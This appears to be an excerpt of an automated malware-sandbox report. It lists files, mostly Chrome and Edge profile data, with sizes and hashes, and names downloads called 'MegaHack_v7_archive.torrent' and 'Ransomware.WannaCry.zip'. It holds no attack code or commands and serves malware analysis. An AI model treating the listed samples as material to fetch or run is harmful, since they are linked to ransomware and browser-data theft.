071bdde4fabfe02b1b8ad1f78d88d1c95a59ba11d316cbc57ffa9fbafa69f2f0a73b75aa1f800922aff870c4b22fbe3bdc884e7dcf51dc24db6d74cd6d93141f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
278fd3006486e701ff8e8be8ae70d2fe

SHA1
05540111365a6e29b54a79aaa8fdcb33d2f092ae

SHA256
cb82629615cbe8f087152954fbba876ef4927810466f9b48f0ad689c5db9d66b

SHA512
1dfe97153efdbddc1dd784fe1d8253692fda425c88f13e938e2bc720c367ca5eb4c6a4464f39bdfb5dded1ce12b7319f1a7ff381633812df06af197c39b83b9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
674ebbf613f8d075d0b16c875ffb522d

SHA1
593a48a6808a8ab62fb3167c712bddae61e8b952

SHA256
c7a3c2fd5b00833ea2a6509e3894a7ede8d4070100ab21a85c64a71ad5659620

SHA512
9f803389d2b95094f1b4ce9a031db8370ef37ba285e81ec2b9daaa225ec59da2fdb79cdbc986ef3582a6c9982206253139ba5d6765e3c4e6a79ab54ce6c6af5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
692B

MD5
a17b9555a9d50c3c7f219a0d1f4a1fe0

SHA1
933733c64a5634fafbd9bdf8bc36c8222f89df7f

SHA256
9411d17f11991fec9193c129ac1163232f58634b4aa3cf6fdcef5dc626133732

SHA512
4fd8c1cbb0d785cc28584a79cfea60b19823b4cd3ac6f247f31dec2fb38ed0269fc03286d31aad1be203095c1d31a2f97c677b43cf9a99ec41a9577f05de9b11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
93256a996b8d2780dd18b5272b2e02bd

SHA1
241a2214655e6ddc9dcaa8cfcefa3155699b72c4

SHA256
d62fb717eb98aad5908437a9ee71d654cd7898e2396ac4cb7d5bf37d9ae75b33

SHA512
4185bdea8beb7d98a2b06040b000e0d6ccf397f08e27f0ec4b0f6f281e01e3976db999974dda2509e3dc7cf9f91a02657fcdf0329fd88d0aa3fe7293b837702d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
b095c08f9f7df1cb67c7dfb1b5bf5d1e

SHA1
e157baa930db8e3d4837c647730105405b2eff86

SHA256
94203c2d431c0fe7b8a593c98774de58c38055254b35eb6904b7cefe3ac2e66e

SHA512
2645e817ba01b4587bd03e1fc63ccf3662dd7f8e5dd9988a53eaa8737345d90b20da33772b72f7e2d2de446b20fa59f9ca58b09c02dfe3f899f036af70b36b8e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
80ac303dd83b640d678f1c75241b165d

SHA1
08fdd9b5cd99dd3dd61b16ce9b84e87a278e74d5

SHA256
ecbb3fac3dddd12ef3be6e6edc885be0062bbcead48bf5c1da8f7e46943fee0e

SHA512
75ac34edeb843b9995fa95b4cf393cc96910293bba3871a65f9f3b0e6e82c07f2428c575be6ba7d5c9f3f60f92e334128bda28874d9d20cb785c04b2a71e5930

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
208301430bc6aac151865c47efce0b28

SHA1
8dab533b801e4cbbc89a65ac843bdc9959c2a4fe

SHA256
10631e469bee70073c6a58284dd67c8c20df65816f022da744dd283a7818f5c6

SHA512
66634711dbf339ac71edb622bebed774bbadaca4f17a7cbbf4a1dde082b9fffb6111b746edd41d271cecec759ffe8738b1b6686f0338ef7a5aed6d5ee2e305d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
01932a8f5bd94255a80273686a3999ee

SHA1
3cf873acd6da7e5516fb298f3b1ed34f374215a5

SHA256
3e8af9dd783edf0c5804b698089ce7587067bd35a18b8ee3013252d1daf604f9

SHA512
e3a5970cb0c4154c0d99aabe6960dc5ce88074543b7da51d6536b91e5a163394d6446a5f768f68cf1fc86f120e009594340923a8c6ae8e0a11af877d44703151

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
473afc099ec7bcd0bd6d37e6410092cb

SHA1
de2938625e30f4c7cb7aafa31271e2f1a8a0ab6f

SHA256
0f611e5b1a01250af849022cf27f48d61f9d2081dc6fa7d88120a4f48a55d560

SHA512
d4ea8640dc3d5ff6cfd5e18738c200a0854c9a3407b074704a7a60817885547fccd4e288abae03e48f09412348b3e28922c2d94e240cb4fff4153e7f13586c0f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
8f954cdc9ca3bd4fd4780a3b39ab2898

SHA1
d68e1c76ec5bcd4f13adeb0bd563bde8a1ab7594

SHA256
f23bb44b3a361b578875c40fc1b52b2b2cbb3c1dc1f54843e062047ab160674f

SHA512
e2f3584411cbd71f7a98edc9e14c9ffa1d9a1f1d85e9a9985c1710e0e186c1eb197995efb9cd45b1a2179d3b42edec1f600deef12decde561a0e4cba59a18baa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c441d266a55f833da73fe5a96f342284

SHA1
2b1439ebc505465e36bf278bc7b78ef1fa9a8f9e

SHA256
48c079ec5d3c2563fa76211e60b028a4df418d1b0fba0608a34262dc1fac83c2

SHA512
a23a23cd832702a45a7c3dcccc00f5f39cd597052f890fecdab21cf42b4b3d0fdc45a23b0e03809045b129ccec211362f2919edba0fbafd031dd9a49e838a0de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
14bea16e79e4dc157cf1fce1cc922505

SHA1
7e6633abf6830f4e0cbcfb6bc8af361a65d9280b

SHA256
fa206e2e9962875320fb1ff7cd80d33997c4690572cd704ab2cbecde533f6a05

SHA512
f88f9d90decbe5e8940dcaf8f27a31707affecd5a4b4dc36ac616c634371f2ebda64ac7216cbdeee7bfb7aa5d18c25cd984b53a538d3b7d8579163a4d1238eaa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
15d28989b463b29c1c629a9fd22f2fc2

SHA1
80c089f01f0ef65af2d22fdb87fce0f0274b3a6c

SHA256
61c2c0c057fb0a67d2d2ecb960bbbec0eadc5840144e9dfb11a2c0ff6c53ba3a

SHA512
9429d63626ff7a56d54170b56affa892aee1a2e44216a6e4e89d47467dba17b0a1fdaed7bf01e4c7eb64bd4a7341ab0d12006d1e9fb273c08886e874e497c9d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ede1f038bd1b1dd41ff2550260876e06

SHA1
51b85fb17b32fc3000a32e2e111f0c8bdd167998

SHA256
1461b013f03fd867c74e927659cf97c9f9099fd5680acfd205bef39303f6cf2d

SHA512
f0c403ec62be65724e755ed10f701a9e8b2715f4a79aecd0b5ee98c5dda50ed80175a2d6ceb6df09ce6649593c449744c5c40e022df5d5b5bff63500d4e8b822

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
10ecb4bb414671e03a9c3a855cc9dde5

SHA1
abab3e870837c1407acdf8055494e352d7374c9f

SHA256
59d9d7d5204c79cf1288622cdaa2e762033a8c37e138739435cfcdded1acb9fe

SHA512
4aec5db842abe37df700158d2304b6aee37786736229d29cd69b6dde714cf6a1d445836ac3448189ffd8e0118dac69f52556c0f321af1b49dbf774963df06bf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
16016fce63304b73d3a897efac69f3cc

SHA1
a5cf6120771aed76f068d6e3317c587631dd041a

SHA256
6c529f0038d502fd1385845e454b42fca91f43875ae45cc141ddd1ade7f6dcf4

SHA512
4909bf0a741e2f83b2a673d25c54e6792de7da40c03816652757eee645f2deafcb50270a3cd230c7d645d91c2ef445bcc30588fbeeb2b1c11d8fe751c65ee93d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
e8f4d119b7a4e48fa1cbb31c09fed279

SHA1
46e49ca1ef99755ee64b8c473127a7a18040ff4e

SHA256
121735a72c1e4d46de9ed3ac469a79aebb66ac0f1f7d22644df522c6eb9b6167

SHA512
abcc1da1538377cb0e3445251a1f9bde0a1a78343c508299d09bcd97a923f59240bc2e37245c10f9cb0b0287146b8593e644eaaa995e9e4cff593275505e2a04

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1a02bdceabf276e8d3bad37df34d4e4e

SHA1
64e841c4d01dbef5e948a78db1f516f3a387c615

SHA256
701f24d525f662667317757011fea84c4139a8d4ddd9fa34b73dd1afba86f0de

SHA512
c77ea9a84b8113b040f8509b261c1703748932c1a755ab1b295874423d7cbc340855981903298c9dfe32380f9ecce14f0366728a9b699ed7c95a42d882a3c7de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8acebafa0d4578c3017d28d230f4692a

SHA1
7c2b9de12f5170a910be498fbb290c84e0bffbd5

SHA256
46c3e1200724da7f0434ea3a9c071be62afdc6069cb60c47589bba14b4659115

SHA512
c1c6c5375fd7d983cac69a3d73bbe99ea696d1681fde3400b1aa6a3c9da999ac43d80d0cc11d13981a2be2b719c209748bfac00297f6972a0b7890b11d105fd4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5c0f159bc642e1a8a76500d5d647ba29

SHA1
b3401d06a60be3ee5fa266fec91d6ffaef8b9712

SHA256
ccfbee1ec396a34e09dd0cc3dbef54681b67a86645b39b4934f5a37f97b47640

SHA512
1e96bebc7e18e61fcac4b7bc121c48702be32f8697d15dda2314a086d486d7a8db833b01a25da15e4df7c8826eda91db39c8eac3b27858b75c870693807fdf9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
08cf085d5ecd2a6dd393c3453cc0225e

SHA1
5d372ddc1aede72e7a0c1287967295b89c50436c

SHA256
444f6afca5ef0666bae31c1a0ccdbb4c6a4dcffbb19da062cec0bd3d882263d3

SHA512
bdf5839fcee767bbb8b7695b1b651665fa174ae9ee15b406a0fd08cf9e97c598cc2407fa51e6708bf7a38d10f5febbc45a6092207417c01e81c94b090777abae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ce429d2884d1a29cb2e1b8d4d83f585a

SHA1
61a7af4e08dac3c761d208e71adefbc0a93e4a2b

SHA256
ffcf6c7c1b69d5495a9fa15935fe56268de790fa1d70f3ef7c74a7bc40c9316b

SHA512
907606e2adbcbc4da63953cf6d906b2982c852c9c10a6e1c19cef26448a82375ebaea25effa05d879ee99b358b3dd2983e5dfeb198443e5ca6deb71c8009cc13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
801133f10886fde1f9635700a6f0a666

SHA1
66be71568d5579d01f05d3fc2c800887b9cc93c3

SHA256
95b8ca722d63bde09cf82b16b1ce99828048ecf1f18610712c2cde8b9b856ae9

SHA512
5c4ec6a056cb21bc676f9cc4b7cb3313a3705897028283bbdb1cf2b9417d7b38835a58e23a4e7eadc6411bca25cf4a63a001fb154d1c6f9179edbb5b57f8d58a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
f58f3dbf7f765b24171507c583da94f5

SHA1
5354b1759227353953bf5b24af1f6979f3740578

SHA256
4428d87e93252379913a71cd9dcbe5124fa8ced140c7b6417c633d960055fc97

SHA512
c94278b48b96697e2556dbeb52f08e2756c00b7feb9ad9b97ed9c2a097676aa67b6037285d472f77045095808d7ee5341ecb15dfab2bda9c57db3db1d93f4bf8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
93c28a435569900da4a16bf19181ddaa

SHA1
b74e060587f9444d532c34497c4f531792e73c4e

SHA256
e0eb0ab3d620ed07e804684b04abbb5171389323da3d2a3db95ad9a61876d09f

SHA512
bd5bfa61b46ac1aba36f7fcbd3d061f05312c516f872ec3b142b3ef36448ab782695f3ae3ec462cb130743b8c8e38244b0c573ebfd5c89c8c665f0f70fbd106d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe641abc.TMP

Filesize
72B

MD5
05c4ceb770faf9564b66feaa115ec3de

SHA1
0f0cd4ff4b7559e9d2188d02f54de73c72522442

SHA256
b65ba1a05693889b8b41d5045fb98713c36e3ed22f20fb0dd80e8bf34ff3d21e

SHA512
abdab2ba39d1995f9111d3dc21e73cd7bedb34a1a40c743fe89beb3d70ff55b32b5663a5f9d1cdd7aac158cc4083e087e743b8e27dde54abb000f5f3e828de86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\c34560b2-1637-427f-9580-65801b4686db.tmp

Filesize
9KB

MD5
d1c4bd0544035da3d9bea7bea1d39ee6

SHA1
9aa1e5478a7c30bca2000f1d5052a06162d2f23d

SHA256
ba4aad57d906b7241ad151c22f2e48f260fac8cb551515fda31ade1b6c9cb85f

SHA512
da67de45aea87127653ba6a085d341c71e56cbdaed987bbc39248625967f657ef0ab21641a84dce18536844b641ec9322235548e0b019ae5329905e8b47a6fbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
125KB

MD5
18e01925e034dc2f695708faa93f4f1a

SHA1
b383a3daf2ddc86f9df6738f8417c35f1fa7a212

SHA256
e0a12be515c493880981855be8de303852b35560d73fadec7512a8cc255d38df

SHA512
175e0ac18b710fd115cbc5773329b3efa73f4fe106499c211f4dbc297fbdd4261b62c7ed65ceb7b44a9d9199e20a818dce27681d0bf1eaf8df9311cd5a74b8dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
125KB

MD5
78fb182e55273a5f0a66d82b36d8f732

SHA1
bc6fc1ac99c5eb2080f20afbc9b9f02de35e379d

SHA256
76fd3db15fe51085ec3f5504aeb7b9603bc75189db2d1dee2320e8fe906cce5a

SHA512
4e04e5502ce05e778b39cc7bbd4a5ea45191680063fabe511099852785ab5588afc4e5d6200d029c690babb27ad9def70a51f1e00e94bafe51dfe115766286ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
34ce44137fc4b5059e925393f0345132

SHA1
9581df6b1042455c1530e2f2d621e5c0df9bf62f

SHA256
7196af2e1f4bcb7ff4cf3480453aab13abd25b5137b1a5d437f66e5d1fa947f7

SHA512
bd0151dd4bc1ac3db4a678260ad71913d933e173ed4db3b2f792af5d4afa3da0d3f8fae2043aadb067dc8a6f0e20083e746e0cbe70c09d6d62306e6bdee57cb4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
98316ad4cd91b06de94dfa98fcce8792

SHA1
597a9b1dfcfff69d2e63abeb0e41bf34ef67c90a

SHA256
dacb81f9f17e5c905649fa1d6d3ce126af4576de48e83fe7c74c559497911995

SHA512
fa430b0e2a9dfd60f14cfc57bd752e315cff7a4a8cc77789dda01525fe6e0a4831d537f6527792f0111661db0d4f3752b0accf1513acd6d7e0daa8ca93ac15d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
488604cd906fc1007dda199c8cfa8a67

SHA1
13bcca5c5d047e46356d39928ee28255f0235bb7

SHA256
27a647a315fbdd2c4ab72d089d15035c2f69a35e33546eca2a28c58cb4dbe88a

SHA512
9625da312a7c3dc25ca1968e1cbc72184a37d7bf7d0bd47bea68f1eaa9231ce265de5f77e230f09fffd3198073f2727530bed2411ff1beb9fdff24a3a0735e31

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
9ef44bb9ba763d858850ef4a156467f7

SHA1
15134537e92401314ae98886602dd5cdc6efb78b

SHA256
c85c689cf7ce1a3596cf56184119074c9190b8fdbdc52c7f04db64a303cf518c

SHA512
61df0773c708f8b5ff11591b53122f4c6c3e9ead592a7e33987337164f650667e98b7a1e0b2a92ae197b994e03f678e4e2fadc1b1128df57fa153a3e439578aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
7KB

MD5
01df140c0d826f4611dce4967341ddcf

SHA1
67c0e6f71b4a6052e3da5183c4e40272d14fdb5d

SHA256
1c0ecb619ebd4c52d4a9b6de02d19863b8bcf767cbeb4e9b3be5e72f55ca6c66

SHA512
a406bdb91767f9450ca791461e028719a2d607c802133aa1276d29a26b32b560dcb0a10f5dfe16bcf2e60112586757317338d0e2ad61b5d10eb674c242c7cb14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
14KB

MD5
92311c994d83c6e9b0b9cea99394ec07

SHA1
b68869111d2c9219f34c391dac2379d8d80a0d96

SHA256
323253b5c5a6ab8aea316a6ba9495f3d5c773d3833ff3cb91dd0aca0de74c272

SHA512
1d6fa14ac682e8fed0bc2ea88c8fbee1abce2b95a5cb84f2e37ffdd6125a83425376b546ecaa719a86bf885f3fd6aeeb5515661a170287e8f45bb61b97eaf850

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
211B

MD5
f4dbce22ebc056f8b63eb6f546091143

SHA1
b76ca67aa1af06c260f5830444a2b785d8084bef

SHA256
4c08c0dcfa5d72c10f89d78e7d5c96703926668c5f35a4e15fdac0755a1c35bd

SHA512
c183b44dd3f98291585386195e82ff9302e1861b0fce563646a7a9b359c490c53e00bf05dd4e059f6ad306bfb3b7a06a29d7d7d8538dce5849dfcb6184fc980d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
5283e63566a169504248fb516a7c1e9f

SHA1
e01c481e60e5f3868af1b45ef303d91f7eaf2d8b

SHA256
93ddf28e1a186e747fcb1b1ddd39c07f7f84dc2d243f0d073a2a303edb7d25cb

SHA512
b75ca96941ce19f8f65ea5fd04ffccd44a88c614ba1cb620f924a78042863ff0251ff9c38091c1db527d7c41ee8972bdf8c31191e6c69dc332b37047bbf9aee2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
24KB

MD5
edecb8c7d540f98d4385b93960ba8e94

SHA1
ec85481d518e98ebf34cd1825af5b9458ca8fa98

SHA256
29d96297449bf2c4a919c74ae7862caa879f9c804dbe013d9e37e914bf376ead

SHA512
c0a2883d22d0d1860a1442a6585f53adc9dec6d2bac0f945a0af2abb797cea1fff58de4522a5cef992c2e7bee413082176490eebd869adc7685e7529d36bba92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
5a62c7686267e12456ae550359d9c081

SHA1
90e479a701b2b8f11fa800a4363385344354da87

SHA256
7d8229c01445f1956391325cca9afc5b726f957551cc9e9d349006384f3e6b51

SHA512
626571f8ed8975faa73ff4a309634352b8d8a472b3b6464f29ef00dc9bfc212ae9363be410036217896174c84cd1cbbceb9a776bc0cac5d7bb329c65e22ee0e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2be8f308-b7db-4427-b0d1-de07c063fcf3\index-dir\the-real-index

Filesize
72B

MD5
13f73c2f3d521f5b390e0999ae050495

SHA1
4356450cb6d9233af3b31b2073a8c7f6e9ee30ca

SHA256
6e299534a896fae67f332dc8972c2dc8ce219099897b74749ae6793c85ca65ec

SHA512
19a11d496d02a7b058f5929d571bf4d751f6dd3de11590d569eadc7455c8c7cd34cc2147038043e65c101e94648570545c632ca7d7e6f59977891af3d8e8d552

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2be8f308-b7db-4427-b0d1-de07c063fcf3\index-dir\the-real-index~RFe62ba80.TMP

Filesize
48B

MD5
3797b885741cd230d760e53daab2c6fe

SHA1
27039eaeb04a09e2d1a2963fe773fd14230667ad

SHA256
edb97e9e0faaf2e355d72c450c0dcee2c576d2d14e82424c21362caf8390d50f

SHA512
94d2b5634cad6af70a243ad2b4d62fbc96bb8fa68106dba2a61013a5e498142b97e077de651888859352ddaf712430a8480e23ec851561437019524c03b63a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\5a8aa04f-2108-43fc-bb40-5c0799d84465\index-dir\the-real-index

Filesize
2KB

MD5
a0e45314409dd5ff6fd4ba55cad0449d

SHA1
beb862d90f7d39ee4e0c1515a5227e72d65b4531

SHA256
0b0d62d641bd7e86f523ae6df620bc356115ef48f0273535991b778520906c21

SHA512
293c9f88d6fe726af1cadfa1b366b2e6674b706acf6ff6ce84ae54c286e253b857559e8e5ff6092e097f14e068fb9c667fc3e12d443fa24d102a161a70ceb383

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\5a8aa04f-2108-43fc-bb40-5c0799d84465\index-dir\the-real-index~RFe630d25.TMP

Filesize
2KB

MD5
a93d51ee53f4ac95c492261f34654a4c

SHA1
a8071a8ea50fb87046da0d2eb9d910015665af6b

SHA256
afe44930e442255137fa086f3890b45803cfed9105041f5250b07c947a86fa7d

SHA512
467341070e10ae993048027e5d2e41bc17a40a7f885a983e0c9e47e10ec8f334ea876d9a6dc232f7e6d556fa1012752921efc154d49a7fb4a7b087c424fc70a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ea9fcb83-a9f6-408a-8d71-ff689591fe45\index-dir\the-real-index

Filesize
72B

MD5
5e310e22b4e16e8e683fa358abd4f458

SHA1
014a00924eebd9cda737f1f2dd0eeae0cc050008

SHA256
745ba817adc38d8b5c7cde739a81bb0ca0b5a9dd521d964a33e72bd31180c2a5

SHA512
b09173aeaaa151811d34d38ca307f95bc09b6a2ea05fa343b4d3d93ca5a4534bb2abbbfec5a016bcf3e1415b1f5aaa0ec5261a1c1623e2d4e0054798a57166df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ea9fcb83-a9f6-408a-8d71-ff689591fe45\index-dir\the-real-index~RFe62ab00.TMP

Filesize
48B

MD5
a408568aa11221b6fdcb630590aa3ee8

SHA1
0947f503ca19fbebf351185b84b8c81337158cd2

SHA256
eeb4b8f21649641bd51a9563438a7f4cb6cbe599593ae8c6419b78b7962dbbc3

SHA512
8e1298272e4f951f333b582b1c87e664907d730c5b3b7aed306ac9b6e6fbea798afa85f0062f1ba43cfe3779aa30f8886a950ac9bcbcb74b9287d2c4bbd87915

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
9b1712c80344e74c3eef732c5458002f

SHA1
87bdcc508b8d82e97abdae6885a1fa069d16f545

SHA256
d1a1aa57f3a901eb27813ce499f12312c07dfedac360d848c795d9e64ab8557b

SHA512
4dfa331421aee55ed3808711ecf6a107ff9cf02645d2b0bac9b77ebde9b3e51ff5091a98bc2eaa5c4e80068fb8edeab5c03e1dd13fa52f2f24caa515017f1304

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
322B

MD5
d23a9834ed5fc778d5df54f551e07224

SHA1
de34305026672b6da8851a91dacb8f601e001ac0

SHA256
3cb56c425900afe8d196e263bee4459be49e7113cdff4acf20b18a37e738339f

SHA512
ae3f437c45be6140fe34955cdc9dbcb00418516e52d08ae677ab413f60091a7a4a0e074cbf07289d192166a9523561da2cef876bef7d0aa07ce127293a625d25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
005302f2faba38bfcb4581325f8ac55a

SHA1
8074237146d0493ba5233c48bec2063f18e20238

SHA256
cc5f98fa7e95fe8501bbcc8863d80808e9362ba73abbf1908576f75e2fcbb6cb

SHA512
251be9f3e1bf08b696a2c497b72cb32ce4ee7573256ce5cd42c1aa2ddcacd63d9e28005c101d29a3fc0a6e9f562b3cc11eb9e1ce1cc2df1eb61113d2cf7289de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe62a265.TMP

Filesize
96B

MD5
7eee74544bff9a5c446e421837d3945a

SHA1
d2f9006fa18a52f4d9d87fd08c1c809ff888c49b

SHA256
3ffedd061e91ed3afe58b895a2750597dd4cdd200bededcab1f001ca042ca6ac

SHA512
b6ba1a736f9ec8709fea6560b571aebfa727a2a6041b262f01f18e325b639d891b5278fc6667a321abb1d54e7898ac67b78139f70ac96239d8e7ec4d9c16ae18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
5KB

MD5
e91a355d7ea1c195e8465b65b5ea029c

SHA1
69fb64f2cac8bcb907be5be25a00a5e7da527cb8

SHA256
99fdf6ceb810d469268a8b0068e6cba55720e9e3037aebe57ec8b15203eca3b3

SHA512
20ab94af38ac406f406e8a28e0ec6b10a407e9e259c200ae3c21afe2fe0c1e12e8e82a4f33d40d0d2a5426a1b5008037bc452b3024f15139effe72d36e1e7068

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
53KB

MD5
cbbb7389e20cb458fbd110711a7fdabc

SHA1
cded18ea050729aa55ac83bc857f26fd5be56a21

SHA256
9f672d132b183393a5a0525e7e0f5bc17ce795a0ae0393c7dade6e2bb2369bca

SHA512
8c2e40e4d3423ba3ba6b28e0ec1720782c37da803ab84d998050667d88274d73f11d6a9b3aa9f5bf18f618dee2d5b268cac91219ebb35f643a086d285aed6e13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
143KB

MD5
cefdc98ba2928c17c0148af8348f5760

SHA1
9bda2f01d0ead8df08cdc2db2ab24b5f512c381f

SHA256
a9b7dbdaa4a72f241ff477a6610a417551546994e1a0be10d357e1d51f14a0ca

SHA512
b72e71d18f30537f83ec5901ac1b2dae401ad6a6d7ef7a4aa7a254dd84a836001661e89c7ac498aabf68d4ab0abdf701f2fcdb90c490726d5caf21e32f679f5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
135KB

MD5
3ed3c7db2b90c8f15587aa6fde18c371

SHA1
badf1a1b416b4670a1a1988faf4cd8d6b96e76b9

SHA256
ab43f8b7dee6c84bca0fd18bc93353be45d33b13eb93b32b3cb80ad3ee54b229

SHA512
cb9a9f9aafa51a244d0abb333e7e3f9f661671ffc455853c2a49bc6cdab26a1637259c2165ce82990b072d6ac21be109861509edb2edb5f9e12293b3f565cc69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
58KB

MD5
4e966338e9ba239b3fe5a1fbdc6c290d

SHA1
76fb6e97d56a786ceec0b710b5a6cf36892502fb

SHA256
733b48fa6314d11eb0a210082ec237fe8d542dc552dedb4fe0b2027fca05f854

SHA512
c9ba346542d7433060892c2e4821ca36bbb846315a8686ad3b4f58f230b0bf7f91930e5c8087f853cf5dc8b2c0d0e91272b19d0355b8d6395ee425ede908f36f

Download Submit
C:\Users\Admin\Downloads\MegaHack_v7_archive.torrent:Zone.Identifier

Filesize
168B

MD5
8a444f20c31d25100f42c23257c1ea8e

SHA1
a1216fa2407803a0ef76ddc5afdeaec015b011d2

SHA256
170d5e921b327a1a2ece235c1ff441afe670058cc2d44b77f8e3d5e2b5324618

SHA512
9a702a2db9f3e86831abee4331159121d41453fbc811f80309419f28f5d1dffa4be516881c694b3b8efd468260698f9cac0f529771c8fd5d976c242b56cc6f49

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

